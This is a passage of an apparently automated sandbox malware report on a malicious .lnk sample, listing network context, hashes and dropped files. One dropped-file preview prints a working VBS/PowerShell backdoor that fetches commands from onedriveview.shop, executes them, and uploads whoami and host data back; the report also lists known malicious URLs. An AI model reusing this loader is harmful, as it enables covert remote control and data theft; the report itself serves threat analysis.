                                                            • Number of executed functions: 11
                                                            • Number of non-executed functions: 1
                                                            Cookbook Comments:
                                                            • Found application associated with file extension: .lnk
                                                            • Override analysis time to 240s for sample based on specific behavior

                                                            Warnings

                                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                            • Excluded IPs from analysis (whitelisted): 2.19.126.143, 2.19.126.149, 184.28.88.176, 18.207.85.246, 107.22.247.231, 54.144.73.197, 34.193.227.236, 162.159.61.3, 172.64.41.3, 2.23.197.184, 184.28.90.27, 2.22.242.11, 2.22.242.123, 192.168.2.4, 23.200.0.34
                                                            • Excluded domains from analysis (whitelisted): e4578.dscg.akamaiedge.net, chrome.cloudflare-dns.com, e8652.dscx.akamaiedge.net, fs.microsoft.com, slscr.update.microsoft.com, acroipm2.adobe.com.edgesuite.net, ctldl.windowsupdate.com, p13n.adobe.io, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, acroipm2.adobe.com, fe3cr.delivery.mp.microsoft.com, ocsp.digicert.com, ssl-delivery.adobe.com.edgekey.net, a122.dscd.akamai.net, e16604.g.akamaiedge.net, geo2.adobe.com, prod.fs.microsoft.com.akadns.net, crl.root-x1.letsencrypt.org.edgekey.net
                                                            • Execution Graph export aborted for target powershell.exe, PID 4476 because it is empty
                                                            • Execution Graph export aborted for target powershell.exe, PID 6928 because it is empty
                                                            • Not all processes where analyzed, report is missing behavior information
                                                            • Report size exceeded maximum capacity and may have missing behavior information.
                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                                            • VT rate limit hit for: Xkci1BfrmX.lnk

                                                            Simulations

                                                            Behavior and APIs

                                                            TimeTypeDescription
                                                            09:30:08API Interceptor123x Sleep call for process: powershell.exe modified
                                                            09:30:18API Interceptor3x Sleep call for process: svchost.exe modified
                                                            09:30:27API Interceptor1x Sleep call for process: AcroCEF.exe modified
                                                            14:30:15Task SchedulerRun new task: ExplorerCoreUpdateTaskMachine path: C:\Users\Public\Libraries\Libraries.vbs

                                                            Joe Sandbox View / Context

                                                            IPs

                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                            188.114.97.3Shipping Documents_pdf.exeGet hashmaliciousFormBookBrowse
                                                            • www.rtprajalojago.live/7vun/
                                                            inject.exeGet hashmaliciousRedLine, XmrigBrowse
                                                            • joxi.net/4Ak49WQH0GE3Nr.mp3
                                                            http://meta.case-page-appeal.eu/community-standard/208273899187123/Get hashmaliciousUnknownBrowse
                                                            • meta.case-page-appeal.eu/assets/k9854w4e5136q5a-f2169603.png
                                                            9q24V7OSys.exeGet hashmaliciousFormBookBrowse
                                                            • www.kzeconomy.top/bopi/?-Z_XO=6kwaqb6m5omublBEUG6Q6qPKP5yOZjcuHwr6+9T02/Tvpmf8nJuTPpmClij6fvBBwm3b&zxltAx=RdCtqlAhlNvlRVfP
                                                            QUOTATION_SEPQTRA071244PDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                            • filetransfer.io/data-package/mfctuvFf/download
                                                            http://brawllstars.ru/Get hashmaliciousHTMLPhisherBrowse
                                                            • brawllstars.ru/
                                                            http://aktiivasi-paylaterr.from-resmi.com/Get hashmaliciousUnknownBrowse
                                                            • aktiivasi-paylaterr.from-resmi.com/
                                                            ECChG5eWfZ.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                            • homker11.uebki.one/GeneratorTest.php
                                                            HpCQgSai4e.exeGet hashmaliciousFormBookBrowse
                                                            • www.zhxgtlw.top/bopi/?XtEdZRAP=tIrAt1o0vWdNGbj/SzADcCGpASEIYc8Vm+jYIgWXaQC1p/Id9tI9XA8Ni4J3RpZHG8N5&8p=DXgPYZ
                                                            QUOTATION_SEPQTRA071244#U00faPDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                            • filetransfer.io/data-package/Ky4pZ0WB/download
                                                            23.56.162.185Snc2ZNvAZP.pdfGet hashmaliciousUnknownBrowse
                                                              Purchase Order IBT LPO-2320.emlGet hashmaliciousUnknownBrowse
                                                                Final_Contract_Copy-532392974.pdfGet hashmaliciousUnknownBrowse
                                                                  Cbequipment-Voice Audio Interface.pdfGet hashmaliciousHTMLPhisherBrowse
                                                                    Runbook - Carolinas Animal Hospital - 2022-05-25 11.28 UTC -04.00.pdfGet hashmaliciousUnknownBrowse
                                                                      Hajj_Advisory pdf lnk.lnkGet hashmaliciousUnknownBrowse
                                                                        blockchair_statement.pdf.lnkGet hashmaliciousUnknownBrowse
                                                                          Signed_Revised_Contract_See also 19_Lgunning_Carisls_Required_Signature.pdfGet hashmaliciousUnknownBrowse
                                                                            Fatura.pdfGet hashmaliciousUnknownBrowse
                                                                              pdf.batGet hashmaliciousUnknownBrowse

                                                                                Domains

                                                                                No context

                                                                                ASNs

                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                CLOUDFLARENETUSPayment Advice Note_Pdf.exeGet hashmaliciousAzorult, GuLoaderBrowse
                                                                                • 172.67.215.93
                                                                                https://tracking.groovesell.com:443/t/1c336171327d66d10a047ef8cbabb880Get hashmaliciousUnknownBrowse
                                                                                • 104.18.22.177
                                                                                3140, EUR.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                • 188.114.97.3
                                                                                factura proforma .docx.docGet hashmaliciousRemcosBrowse
                                                                                • 172.67.216.244
                                                                                http://email.app.loyalty.appstle.com/c/eJwczE2uLBEUAODVMHty6vgfGLxJ7YNCldsaadKJ3d_kbuCLDpJVWtPkDo1aHlqApo_j-QrGx0NGE5VRkkMwCbUEaa334GlxCCjAogErldDsyjIGyVXM-UCInAjwY7Dat69rMz_GXDWxq79pdc9aYxL-n-BJ8KylvUpjoXSC5_2T2iwlljsRPOnHhc--S1VIBHzvyVp-sdbpchGMyvkfJvbe8-mj5P2nfx3-BgAA__-UbkEqGet hashmaliciousUnknownBrowse
                                                                                • 1.1.1.1
                                                                                https://www.google.com.ai/amp/clck.ru/3DSSCz?hghghghHGVGvbbgffGFHGJdgddghfhghfgdgdgdgfhgg?sdfsewsrewrettfgGet hashmaliciousGRQ ScamBrowse
                                                                                • 104.21.27.6
                                                                                https://techservealliance.orgGet hashmaliciousUnknownBrowse
                                                                                • 104.18.142.119
                                                                                SCAN_Client_No_XP9739270128398468932393.pdfGet hashmaliciousHTMLPhisherBrowse
                                                                                • 104.21.90.191
                                                                                https://cganet.com/Get hashmaliciousUnknownBrowse
                                                                                • 104.22.0.204
                                                                                https://ck.storematch.jp/bc?d=11044D9580EY4W1C2FD019VB3VD27BCW862C0351F9E0EA8-cdlaq4&B=a4f71fd1c235a114f94297e8a0a36c6e&sc_i=shp_pc_promo_mdRMBP_disp_mcad&rd=//interglobalcargoexpress.com/yuuuii#aW5mb0B2b3NzbG9oLmNvbQ==Get hashmaliciousHTMLPhisherBrowse
                                                                                • 104.17.25.14
                                                                                AKAMAI-ASUSSnc2ZNvAZP.pdfGet hashmaliciousUnknownBrowse
                                                                                • 23.56.162.185
                                                                                Purchase Order IBT LPO-2320.emlGet hashmaliciousUnknownBrowse
                                                                                • 23.56.162.185
                                                                                SCAN_Client_No_XP9739270128398468932393.pdfGet hashmaliciousHTMLPhisherBrowse
                                                                                • 96.17.64.189
                                                                                file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                • 104.102.49.254
                                                                                file.exeGet hashmaliciousLummaCBrowse
                                                                                • 104.102.49.254
                                                                                file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                • 104.102.49.254
                                                                                file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                • 104.102.49.254
                                                                                https://content.app-us1.com/5zbe53/2024/09/30/8d9df716-ca99-47ed-825e-d3a2a0e6cd9e.pdfGet hashmaliciousHTMLPhisherBrowse
                                                                                • 23.47.168.24
                                                                                Tonincasa Updated Employee sheet .pdfGet hashmaliciousHTMLPhisherBrowse
                                                                                • 104.77.220.172
                                                                                MagicUtilities-Setup-3.1.4.5-Win10.exeGet hashmaliciousUnknownBrowse
                                                                                • 184.28.90.27

                                                                                JA3 Fingerprints

                                                                                No context

                                                                                Dropped Files

                                                                                No context

                                                                                Created / dropped Files

                                                                                C:\ProgramData\Microsoft\Network\Downloader\edb.chk

                                                                                Download File
                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):8192
                                                                                Entropy (8bit):0.363788168458258
                                                                                Encrypted:false
                                                                                SSDEEP:6:6xPoaaD0JOCEfMuaaD0JOCEfMKQmDNOxPoaaD0JOCEfMuaaD0JOCEfMKQmDN:1aaD0JcaaD0JwQQbaaD0JcaaD0JwQQ
                                                                                MD5:0E72F896C84F1457C62C0E20338FAC0D
                                                                                SHA1:9C071CC3D15E5BD8BF603391AE447202BD9F8537
                                                                                SHA-256:686DC879EA8690C42D3D5D10D0148AE7110FA4D8DCCBF957FB8E41EE3D4A42B3
                                                                                SHA-512:AAA5BE088708DABC2EC9A7A6632BDF5700BE719D3F72B732BD2DFD1A3CFDD5C8884BFA4951DB0C499AF423EC30B14A49A30FBB831D1B0A880FE10053043A4251
                                                                                Malicious:false
                                                                                Preview:*.>...........&.....D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@......................................................&.............................................................................................................................................................................................................................................................................................................................................................

                                                                                C:\ProgramData\Microsoft\Network\Downloader\edb.log

                                                                                Download File
                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):1310720
                                                                                Entropy (8bit):1.3108408904639433
                                                                                Encrypted:false
                                                                                SSDEEP:3072:5JCnRjDxImmaooCEYhlOe2Pp4mH45l6MFXDaFXpVv1L0Inc4lfEnogVsiJKrvr8:KooCEYhgYEL0In
                                                                                MD5:ED84830F06DB1AF064C9BA3C759095E7
                                                                                SHA1:F7A73C9B7825598C657500F1964EB36775ABB1F0
                                                                                SHA-256:71373E9FC4078845C7E35291AA398299A01D010AED8E48DCF397E3BFBFEFDC8B
                                                                                SHA-512:A0FA5F7D032E2A08114287FE6477F215D781E66BB2D94D15C09829DD09CA0C00188C0168A6693DDE5F56EE203290D883B880414B7609E0F8912BD01D817A7C71
                                                                                Malicious:false
                                                                                Preview:z3..........@..@.;...{..................<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@..........................................#.................................................................................................................................................................................................................................................................................................................................................

                                                                                C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

                                                                                Download File
                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                File Type:Extensible storage engine DataBase, version 0x620, checksum 0x1a3e94e8, page size 16384, Windows version 10.0
                                                                                Category:dropped
                                                                                Size (bytes):1310720
                                                                                Entropy (8bit):0.4222661967884443
                                                                                Encrypted:false
                                                                                SSDEEP:1536:nSB2ESB2SSjlK/uedMrSU0OrsJzvqYkr3g16f2UPkLk+ku4/Iw4KKazAkUk1k2DO:nazag03A2UrzJDO
                                                                                MD5:187660C4B34EC4F31FD4BD3D38F8C00E
                                                                                SHA1:91310B120A82B4AEC9C3E2B3ED18456FAFE93138
                                                                                SHA-256:36953BECAC8F89ADA158D141F05A60A6DF566F8FED922600280333D9B9190ACA
                                                                                SHA-512:4C3F689CD2FD3081F031437386199ADE5B718CD5A35B58ED2C8FAE7BC91B06D1B6F7EE3213D01EC21E7F8689F47C7F63EDCD58A26CDF5150FBB96D33769C9984
                                                                                Malicious:false
                                                                                Preview:.>..... .......Y.......X\...;...{......................n.%....."!...|.......|..h.#....."!...|..n.%.........D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ............................................................................................................................................................................................................2...{...................................h.%"!...|......................"!...|...........................#......n.%.....................................................................................................................................................................................................................................................................................................................................................

                                                                                C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

                                                                                Download File
                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):16384
                                                                                Entropy (8bit):0.079493094667473
                                                                                Encrypted:false
                                                                                SSDEEP:3:hCEetYeHs74ctq64yHNs4msZDllOE/tlnl+/rTc:0dzHa4c64fpMP
                                                                                MD5:B6EDEF476DF41398EC00EAC23CE03443
                                                                                SHA1:88F1FB99D61E0A0F05C92BEE4E14E3202F428241
                                                                                SHA-256:38775588C267EFC89B7BA49678EE2DEBEC574032BF708E0FD9755A8E9122FE28
                                                                                SHA-512:A62F2F8E5D2A09CEFE8DBB0C7F18181D9114A8FC6A359D2D673892AB6CFE0F0EB5496385E46D8FCAEA691ACB6513E84B97E758922B9731235873A6B9C59F202F
                                                                                Malicious:false
                                                                                Preview:..(......................................;...{.......|.."!...|.........."!...|.."!...|......"!...|......................"!...|..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                C:\Users\Public\Libraries\Libraries.vbs

                                                                                Download File
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:ASCII text, with very long lines (842), with CRLF, LF line terminators
                                                                                Category:dropped
                                                                                Size (bytes):909
                                                                                Entropy (8bit):5.411141970162526
                                                                                Encrypted:false
                                                                                SSDEEP:24:2jXxuqQZjZGbSBcV1oeoQVrL2/8xap7Uu73VoeW9:UhQdYbSBw1ojQVeEUp7J7loP
                                                                                MD5:529D1544CE8AA060D2AA1EB777B5482F
                                                                                SHA1:1ED490D4A983B8D3D03D4E4AB8022FBC258D5AE8
                                                                                SHA-256:B3913FF1ACFC55AC4EBFBFBFB910A00E3502541672D2F602EF7D9A56796F0012
                                                                                SHA-512:D5DABB4EF251EED2A99519A66DB74024EED598D6B8428E144D0920B8A018443790EF30538C8FCB3D92E0E9DC46D0EAA6224B56125EB95EEACFE97A8FE36A98CC
                                                                                Malicious:true
                                                                                Yara Hits:
                                                                                • Rule: JoeSecurity_LonePage, Description: Yara detected LonePage, Source: C:\Users\Public\Libraries\Libraries.vbs, Author: Joe Security
                                                                                Preview:dim r, c.set r = createobject("WScript.Shell").c = "powershell.exe -executionpolicy bypass -w hidden -noprofile -c start-sleep 39;start-sleep (get-random -min 5 -max 43);start-sleep 11;$iik=new-object net.webclient;$rc = -join ((48..57) | get-random -count( get-random -min 5 -max 15) | foreach-object { [char]$_}) + '.txt';$flm=$iik.downloaddata('https://onedriveview.shop/api/values/82980464243822115700/refresh81/'+$rc);if($flm.Length -gt 1){$jkr=[system.text.encoding]::utf8.getString($flm);if($jkr -match 'get-content'){[byte[]] $drpy=IEX $jkr;}else{$bjdo=whoami;$bjdo+='==';$bjdo+=[System.Net.Dns]::GetHostAddresses($ip)+[System.Environment]::NewLine;$hbn=IEX $jkr;$bjdo+=$hbn|Out-string;[byte[]]$drpy=[system.text.encoding]::Utf8.GetBytes($bjdo);};start-sleep 10;$ujk=new-object net.webclient;start-sleep 16;$ujk.uploaddata('https://onedriveview.shop/api/values/refresh81',$drpy);}".r.Run c, 0, false..

                                                                                C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG

                                                                                Download File
                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                File Type:ASCII text
                                                                                Category:dropped
                                                                                Size (bytes):292
                                                                                Entropy (8bit):5.181974504022235
                                                                                Encrypted:false
                                                                                SSDEEP:6:PIuXnU2f6DM+q2Pwkn2nKuAl9OmbnIFUt82IuXnU0CgZmw+2IuXnctDMVkwOwknf:Pdnxf/+vYfHAahFUt82dnP/+2dnPV5JK
                                                                                MD5:73BA435847E028D867C4CB28FB91B4E6
                                                                                SHA1:6775B11584E21A7134B4A71BD298FA51D2F0A5ED
                                                                                SHA-256:6F9C5A875BFA297CCE7E0743E1B3B57952665284C867F43C150936842E1442A0
                                                                                SHA-512:7CDD8E904FE8DE79293CE09B86F3A34B8BE3492BC54CA4D05DD20BA659A1CCCABF8540362C23FB5AA5BCFA9D3D2A8B7F0169222A853532FEF326619804FB1AB2
                                                                                Malicious:false
                                                                                Preview:2024/09/30-09:30:18.617 1c1c Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2024/09/30-09:30:18.619 1c1c Recovering log #3.2024/09/30-09:30:18.620 1c1c Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .

                                                                                C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG.old (copy)

                                                                                Download File
                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                File Type:ASCII text
                                                                                Category:dropped
                                                                                Size (bytes):292
                                                                                Entropy (8bit):5.181974504022235
                                                                                Encrypted:false
                                                                                SSDEEP:6:PIuXnU2f6DM+q2Pwkn2nKuAl9OmbnIFUt82IuXnU0CgZmw+2IuXnctDMVkwOwknf:Pdnxf/+vYfHAahFUt82dnP/+2dnPV5JK
                                                                                MD5:73BA435847E028D867C4CB28FB91B4E6
                                                                                SHA1:6775B11584E21A7134B4A71BD298FA51D2F0A5ED
                                                                                SHA-256:6F9C5A875BFA297CCE7E0743E1B3B57952665284C867F43C150936842E1442A0
                                                                                SHA-512:7CDD8E904FE8DE79293CE09B86F3A34B8BE3492BC54CA4D05DD20BA659A1CCCABF8540362C23FB5AA5BCFA9D3D2A8B7F0169222A853532FEF326619804FB1AB2
                                                                                Malicious:false
                                                                                Preview:2024/09/30-09:30:18.617 1c1c Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2024/09/30-09:30:18.619 1c1c Recovering log #3.2024/09/30-09:30:18.620 1c1c Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .

                                                                                C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG

                                                                                Download File
                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                File Type:ASCII text
                                                                                Category:dropped
                                                                                Size (bytes):336
                                                                                Entropy (8bit):5.1824976200321
                                                                                Encrypted:false
                                                                                SSDEEP:6:PIuXnWYVq2Pwkn2nKuAl9Ombzo2jMGIFUt82IuXnDgZmw+2IuXnmIkwOwkn2nKuA:PdnWAvYfHAa8uFUt82dnc/+2dnR5JfHA
                                                                                MD5:DE5E942A5A801BDFF043FEEEFDEF172F
                                                                                SHA1:08686C9E3829E83ADED0FBD444132088AE433277
                                                                                SHA-256:DDF2B1355A37B960361B6130A208A1605320663523CE407223AF0DD0F34A03D1
                                                                                SHA-512:5D9098A5040FC36705106267B1AC5F8F9E657FCC0496D9494994873A78735073C4416C3DF7C3FD908B8BB56F5B6E3C9D4CC1713A6638BD9FA964CD61EBFD48DD
                                                                                Malicious:false
                                                                                Preview:2024/09/30-09:30:18.639 1d24 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/MANIFEST-000001.2024/09/30-09:30:18.640 1d24 Recovering log #3.2024/09/30-09:30:18.641 1d24 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/000003.log .

                                                                                C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG.old (copy)

                                                                                Download File
                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                File Type:ASCII text
                                                                                Category:dropped
                                                                                Size (bytes):336
                                                                                Entropy (8bit):5.1824976200321
                                                                                Encrypted:false
                                                                                SSDEEP:6:PIuXnWYVq2Pwkn2nKuAl9Ombzo2jMGIFUt82IuXnDgZmw+2IuXnmIkwOwkn2nKuA:PdnWAvYfHAa8uFUt82dnc/+2dnR5JfHA
                                                                                MD5:DE5E942A5A801BDFF043FEEEFDEF172F
                                                                                SHA1:08686C9E3829E83ADED0FBD444132088AE433277
                                                                                SHA-256:DDF2B1355A37B960361B6130A208A1605320663523CE407223AF0DD0F34A03D1
                                                                                SHA-512:5D9098A5040FC36705106267B1AC5F8F9E657FCC0496D9494994873A78735073C4416C3DF7C3FD908B8BB56F5B6E3C9D4CC1713A6638BD9FA964CD61EBFD48DD
                                                                                Malicious:false
                                                                                Preview:2024/09/30-09:30:18.639 1d24 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/MANIFEST-000001.2024/09/30-09:30:18.640 1d24 Recovering log #3.2024/09/30-09:30:18.641 1d24 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/000003.log .

                                                                                C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\10b2b525-9172-4d37-b9d5-5ca454f25ae1.tmp

                                                                                Download File
                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                File Type:JSON data
                                                                                Category:modified
                                                                                Size (bytes):475
                                                                                Entropy (8bit):4.969218232891527
                                                                                Encrypted:false
                                                                                SSDEEP:12:YH/um3RA8sqlcHWsBdOg2HOAcaq3QYiubInP7E4T3y:Y2sRdsw27dMHk3QYhbG7nby
                                                                                MD5:B59E0DEE4A29789CAE887F3535A7D0A8
                                                                                SHA1:3C96D83557629DE4BF0F121EC3D2D3EF9946A7B9
                                                                                SHA-256:39FEEBD2C77ECDE3AFC46D50ADE5924E7454E5E094321905BF1F7DA0E99CCCCF
                                                                                SHA-512:55D660B4BC772DFE8BB71503033FA4BC8261CB8C4FBD81CBEDABF1649DFF702302AE15F038291ABEAFA40A371037D1B3E9C5775B7D2A3559EC7D2E063B0ABFCC
                                                                                Malicious:false
                                                                                Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13372263027181049","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":125216},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.4","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"4G"}}}

                                                                                C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\Network Persistent State (copy)

                                                                                Download File
                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                File Type:JSON data
                                                                                Category:dropped
                                                                                Size (bytes):475
                                                                                Entropy (8bit):4.969218232891527
                                                                                Encrypted:false
                                                                                SSDEEP:12:YH/um3RA8sqlcHWsBdOg2HOAcaq3QYiubInP7E4T3y:Y2sRdsw27dMHk3QYhbG7nby
                                                                                MD5:B59E0DEE4A29789CAE887F3535A7D0A8
                                                                                SHA1:3C96D83557629DE4BF0F121EC3D2D3EF9946A7B9
                                                                                SHA-256:39FEEBD2C77ECDE3AFC46D50ADE5924E7454E5E094321905BF1F7DA0E99CCCCF
                                                                                SHA-512:55D660B4BC772DFE8BB71503033FA4BC8261CB8C4FBD81CBEDABF1649DFF702302AE15F038291ABEAFA40A371037D1B3E9C5775B7D2A3559EC7D2E063B0ABFCC
                                                                                Malicious:false
                                                                                Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13372263027181049","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":125216},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.4","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"4G"}}}

                                                                                C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\000003.log

                                                                                Download File
                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):4320
                                                                                Entropy (8bit):5.258479666571708
                                                                                Encrypted:false
                                                                                SSDEEP:96:etJCV4FAsszrNamjTN/2rjYMta02fDtehgO7BtTgo7e/z:etJCV4FiN/jTN/2r8Mta02fEhgO73goa
                                                                                MD5:BB3E9CB8C513782BF039ADD5284FFF9F
                                                                                SHA1:61849639BCCA1FC4207A6B777753E948EFA981D6
                                                                                SHA-256:37F2B56EF052BB9804108A33A344558F932BEBB78901ADD7C737DF8FA34616AB
                                                                                SHA-512:381D19F8C3B6AAB9374251FDA9C79555A84E663D235DC64C28161D98195BED12C939668CBAFCF918A0165F819DB89455076A1EE64678CD9ABF8BCEA4BBAAC597
                                                                                Malicious:false
                                                                                Preview:*...#................version.1..namespace-['O.o................next-map-id.1.Pnamespace-158f4913_074a_4bdf_b463_eb784cc805b4-https://rna-resource.acrobat.com/.0>...r................next-map-id.2.Snamespace-fd2db5bd_ef7e_4124_bfa7_f036ce1d74e5-https://rna-v2-resource.acrobat.com/.1O..r................next-map-id.3.Snamespace-cd5be8d1_42d2_481d_ac0e_f904ae470bda-https://rna-v2-resource.acrobat.com/.2.\.o................next-map-id.4.Pnamespace-6070ce43_6a74_4d0a_9cb8_0db6c3126811-https://rna-resource.acrobat.com/.3....^...............Pnamespace-158f4913_074a_4bdf_b463_eb784cc805b4-https://rna-resource.acrobat.com/..|.^...............Pnamespace-6070ce43_6a74_4d0a_9cb8_0db6c3126811-https://rna-resource.acrobat.com/n..Fa...............Snamespace-fd2db5bd_ef7e_4124_bfa7_f036ce1d74e5-https://rna-v2-resource.acrobat.com/DQ..a...............Snamespace-cd5be8d1_42d2_481d_ac0e_f904ae470bda-https://rna-v2-resource.acrobat.com/i.`do................next-map-id.5.Pnamespace-de635bf2_6773_4d83_ad16_

                                                                                C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG

                                                                                Download File
                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                File Type:ASCII text
                                                                                Category:dropped
                                                                                Size (bytes):324
                                                                                Entropy (8bit):5.169558994451496
                                                                                Encrypted:false
                                                                                SSDEEP:6:PIuqVq2Pwkn2nKuAl9OmbzNMxIFUt82IuACgZmw+2IuATcSIkwOwkn2nKuAl9Omk:PUvYfHAa8jFUt82+n/+2+TQ5JfHAa84J
                                                                                MD5:F1500E0B526B6DCA8C33651438EB31B3
                                                                                SHA1:24BE51C0B220EF8D1BB55D32842F4C94951F4C04
                                                                                SHA-256:09603061E48B9BBBD5BF748FFD9BAE266F41CE7C4EDA3BDD0A55976B19335A6A
                                                                                SHA-512:3C0C62ABCF77D289AC36D2CF04DDBCC277ED0122795FF8E258D0A685B98CCEDB7F02662544904FCDC390A323063D0E181BACFF36A2AA4B029A5B03A3F42161DE
                                                                                Malicious:false
                                                                                Preview:2024/09/30-09:30:19.378 1d24 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2024/09/30-09:30:19.403 1d24 Recovering log #3.2024/09/30-09:30:19.406 1d24 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .

                                                                                C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG.old (copy)

                                                                                Download File
                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                File Type:ASCII text
                                                                                Category:dropped
                                                                                Size (bytes):324
                                                                                Entropy (8bit):5.169558994451496
                                                                                Encrypted:false
                                                                                SSDEEP:6:PIuqVq2Pwkn2nKuAl9OmbzNMxIFUt82IuACgZmw+2IuATcSIkwOwkn2nKuAl9Omk:PUvYfHAa8jFUt82+n/+2+TQ5JfHAa84J
                                                                                MD5:F1500E0B526B6DCA8C33651438EB31B3
                                                                                SHA1:24BE51C0B220EF8D1BB55D32842F4C94951F4C04
                                                                                SHA-256:09603061E48B9BBBD5BF748FFD9BAE266F41CE7C4EDA3BDD0A55976B19335A6A
                                                                                SHA-512:3C0C62ABCF77D289AC36D2CF04DDBCC277ED0122795FF8E258D0A685B98CCEDB7F02662544904FCDC390A323063D0E181BACFF36A2AA4B029A5B03A3F42161DE
                                                                                Malicious:false
                                                                                Preview:2024/09/30-09:30:19.378 1d24 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2024/09/30-09:30:19.403 1d24 Recovering log #3.2024/09/30-09:30:19.406 1d24 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .

                                                                                C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages

                                                                                Download File
                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3040000, file counter 17, database pages 21, cookie 0x5, schema 4, UTF-8, version-valid-for 17
